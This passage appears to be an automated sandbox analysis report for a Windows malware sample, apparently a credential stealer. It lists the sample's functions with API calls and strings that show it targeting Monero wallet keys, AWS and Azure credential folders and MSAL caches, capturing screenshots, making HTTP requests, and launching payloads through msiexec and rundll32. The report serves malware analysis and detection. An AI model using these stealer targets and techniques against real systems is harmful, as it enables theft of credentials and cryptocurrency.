                          • Instruction Fuzzy Hash: 2A12CE71920218ABDB15EBA0DC95FEEB378BF14700F5442A9F106720D1EF706A89DF65
                          Function 00BFCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C08B60: GetSystemTime.KERNEL32(00C10E1A,006E9B18,00C105AE,?,?,00BF13F9,?,0000001A,00C10E1A,00000000,?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C08B86
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BFCF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BFD0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00BFD0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 00BFD208
                          • lstrcat.KERNEL32(?,00C11478), ref: 00BFD217
                          • lstrcat.KERNEL32(?,00000000), ref: 00BFD22A
                          • lstrcat.KERNEL32(?,00C1147C), ref: 00BFD239
                          • lstrcat.KERNEL32(?,00000000), ref: 00BFD24C
                          • lstrcat.KERNEL32(?,00C11480), ref: 00BFD25B
                          • lstrcat.KERNEL32(?,00000000), ref: 00BFD26E
                          • lstrcat.KERNEL32(?,00C11484), ref: 00BFD27D
                          • lstrcat.KERNEL32(?,00000000), ref: 00BFD290
                          • lstrcat.KERNEL32(?,00C11488), ref: 00BFD29F
                          • lstrcat.KERNEL32(?,00000000), ref: 00BFD2B2
                          • lstrcat.KERNEL32(?,00C1148C), ref: 00BFD2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 00BFD2D4
                          • lstrcat.KERNEL32(?,00C11490), ref: 00BFD2E3
                            • Part of subcall function 00C0A820: lstrlen.KERNEL32(00BF4F05,?,?,00BF4F05,00C10DDE), ref: 00C0A82B
                            • Part of subcall function 00C0A820: lstrcpy.KERNEL32(00C10DDE,00000000), ref: 00C0A885
                          • lstrlen.KERNEL32(?), ref: 00BFD32A
                          • lstrlen.KERNEL32(?), ref: 00BFD339
                            • Part of subcall function 00C0AA70: StrCmpCA.SHLWAPI(006E88C0,00BFA7A7,?,00BFA7A7,006E88C0), ref: 00C0AA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 00BFD3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: 04b43aa2d07115db67ef736c79fc1888342b4f79baa3ac7c40b5f307d1622a92
                          • Instruction ID: fda0b3e3da6594a215bddaf3c1f07776b33512477c8f2cd963abfb92aa8fa10b
                          • Opcode Fuzzy Hash: 04b43aa2d07115db67ef736c79fc1888342b4f79baa3ac7c40b5f307d1622a92
                          • Instruction Fuzzy Hash: 0DE11E71910208AFCB04EBA1DD9AEEE7778BF14301F144168F647B70D1DE35AA49EB62
                          Function 00BFC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,006ECFC0,00000000,?,00C1144C,00000000,?,?), ref: 00BFCA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00BFCA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00BFCA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BFCAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00BFCAD9
                          • StrStrA.SHLWAPI(?,006ECE10,00C10B52), ref: 00BFCAF7
                          • StrStrA.SHLWAPI(00000000,006ECE28), ref: 00BFCB1E
                          • StrStrA.SHLWAPI(?,006ED6B8,00000000,?,00C11458,00000000,?,00000000,00000000,?,006E8980,00000000,?,00C11454,00000000,?), ref: 00BFCCA2
                          • StrStrA.SHLWAPI(00000000,006ED478), ref: 00BFCCB9
                            • Part of subcall function 00BFC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BFC871
                            • Part of subcall function 00BFC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BFC87C
                          • StrStrA.SHLWAPI(?,006ED478,00000000,?,00C1145C,00000000,?,00000000,006E8990), ref: 00BFCD5A
                          • StrStrA.SHLWAPI(00000000,006E8B50), ref: 00BFCD71
                            • Part of subcall function 00BFC820: lstrcat.KERNEL32(?,00C10B46), ref: 00BFC943
                            • Part of subcall function 00BFC820: lstrcat.KERNEL32(?,00C10B47), ref: 00BFC957
                            • Part of subcall function 00BFC820: lstrcat.KERNEL32(?,00C10B4E), ref: 00BFC978
                          • lstrlen.KERNEL32(00000000), ref: 00BFCE44
                          • CloseHandle.KERNEL32(00000000), ref: 00BFCE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: a5915517f1cdb750e4a2786cb87202dd1a2831f902425553dfac0694aec15569
                          • Instruction ID: da578603c0f12a871967e8b8e65e8a0430a30ead70304d9ce0e9a98e002bacfe
                          • Opcode Fuzzy Hash: a5915517f1cdb750e4a2786cb87202dd1a2831f902425553dfac0694aec15569
                          • Instruction Fuzzy Hash: E8E1E971910208ABDB14EBA5DC96FEEB778AF14300F448169F106771D1EF346A8ADF62
                          Function 00C08320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          • RegOpenKeyExA.ADVAPI32(00000000,006EACE0,00000000,00020019,00000000,00C105B6), ref: 00C083A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C08426
                          • wsprintfA.USER32 ref: 00C08459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C0847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00C0848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00C08499
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: eb17c2ee8c6909f4c2eac921d68385de85bbbccc576e666106ea72f5d7c03465
                          • Instruction ID: c66c8b663557203182071ac437656e1aafe3caeb48dc363c1fba64e479a4e31e
                          • Opcode Fuzzy Hash: eb17c2ee8c6909f4c2eac921d68385de85bbbccc576e666106ea72f5d7c03465
                          • Instruction Fuzzy Hash: 5781FC7191021CAFDB28DB54CD95FEAB7B8BF58700F00C299E149A6180DF716B89DF91
                          Function 00C04D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C08E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00C04DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00C04DCD
                            • Part of subcall function 00C04910: wsprintfA.USER32 ref: 00C0492C
                            • Part of subcall function 00C04910: FindFirstFileA.KERNEL32(?,?), ref: 00C04943
                          • lstrcat.KERNEL32(?,00000000), ref: 00C04E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00C04E59
                            • Part of subcall function 00C04910: StrCmpCA.SHLWAPI(?,00C10FDC), ref: 00C04971
                            • Part of subcall function 00C04910: StrCmpCA.SHLWAPI(?,00C10FE0), ref: 00C04987
                            • Part of subcall function 00C04910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C04B7D
                            • Part of subcall function 00C04910: FindClose.KERNEL32(000000FF), ref: 00C04B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00C04EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00C04EE5
                            • Part of subcall function 00C04910: wsprintfA.USER32 ref: 00C049B0
                            • Part of subcall function 00C04910: StrCmpCA.SHLWAPI(?,00C108D2), ref: 00C049C5
                            • Part of subcall function 00C04910: wsprintfA.USER32 ref: 00C049E2
                            • Part of subcall function 00C04910: PathMatchSpecA.SHLWAPI(?,?), ref: 00C04A1E
                            • Part of subcall function 00C04910: lstrcat.KERNEL32(?,006EE4A0), ref: 00C04A4A
                            • Part of subcall function 00C04910: lstrcat.KERNEL32(?,00C10FF8), ref: 00C04A5C
                            • Part of subcall function 00C04910: lstrcat.KERNEL32(?,?), ref: 00C04A70
                            • Part of subcall function 00C04910: lstrcat.KERNEL32(?,00C10FFC), ref: 00C04A82
                            • Part of subcall function 00C04910: lstrcat.KERNEL32(?,?), ref: 00C04A96
                            • Part of subcall function 00C04910: CopyFileA.KERNEL32(?,?,00000001), ref: 00C04AAC
                            • Part of subcall function 00C04910: DeleteFileA.KERNEL32(?), ref: 00C04B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: 99836cd3042674fdfa4dc515246ad0f6986f7d6648bafd39e8ca2d22fc5bb67a
                          • Instruction ID: 39d8fb57eb016a1e5c0b4303b63b70ba35ad8ac94ad038bb259a00dafdd523a0
                          • Opcode Fuzzy Hash: 99836cd3042674fdfa4dc515246ad0f6986f7d6648bafd39e8ca2d22fc5bb67a
                          • Instruction Fuzzy Hash: 5E4184B994030866CB54F770EC8BFED3738AB25700F4449A4B685660C1EDB59BCDEB92
                          Function 00C09010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                          Download Yara Rule
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C0906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: e9ab63bbd7f724bb2436f4f3e4f7545692f206f0398b54df17004e578dae26b7
                          • Instruction ID: f407b9327a4bc16ce6b2eeea824d0a6434279caaa970f43b5758a50fd39baf7a
                          • Opcode Fuzzy Hash: e9ab63bbd7f724bb2436f4f3e4f7545692f206f0398b54df17004e578dae26b7
                          • Instruction Fuzzy Hash: 2571DB71A10208AFDB04DBE5DC89FEEBBB8AF48700F148518F655A7290DB35A949CB61
                          Function 00C02E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00C031C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00C0335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00C034EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: c4ee630838c7119118a1968249c882fe6afee143c565c033048450c52c07db79
                          • Instruction ID: 5011a10acaf648dbc825642be56327eb1d8efc47cbd4a4642be718d0fc37bb61
                          • Opcode Fuzzy Hash: c4ee630838c7119118a1968249c882fe6afee143c565c033048450c52c07db79
                          • Instruction Fuzzy Hash: BE1210719102089ADB15FBA0DD96FEEB738AF14300F508169F506761D1EF742B8ADFA2
                          Function 00C052C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                            • Part of subcall function 00BF6280: InternetOpenA.WININET(00C10DFE,00000001,00000000,00000000,00000000), ref: 00BF62E1
                            • Part of subcall function 00BF6280: StrCmpCA.SHLWAPI(?,006EE4D0), ref: 00BF6303
                            • Part of subcall function 00BF6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BF6335
                            • Part of subcall function 00BF6280: HttpOpenRequestA.WININET(00000000,GET,?,006EDC58,00000000,00000000,00400100,00000000), ref: 00BF6385
                            • Part of subcall function 00BF6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BF63BF
                            • Part of subcall function 00BF6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BF63D1
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C05318
                          • lstrlen.KERNEL32(00000000), ref: 00C0532F
                            • Part of subcall function 00C08E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C08E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00C05364
                          • lstrlen.KERNEL32(00000000), ref: 00C05383
                          • lstrlen.KERNEL32(00000000), ref: 00C053AE
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: 0f964bcf1738db0f124e857142888504a7954d816ddc85714f4d285242dba566
                          • Instruction ID: 6babed0e05436342d86f527b958ec3785f939c64abb474e205e4471a45d3a1c7
                          • Opcode Fuzzy Hash: 0f964bcf1738db0f124e857142888504a7954d816ddc85714f4d285242dba566
                          • Instruction Fuzzy Hash: E851FB309102489BCB14EF65CD96FEE7779AF14300F508528E9066B5D1EF346B4AEB62
                          Function 00C012D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
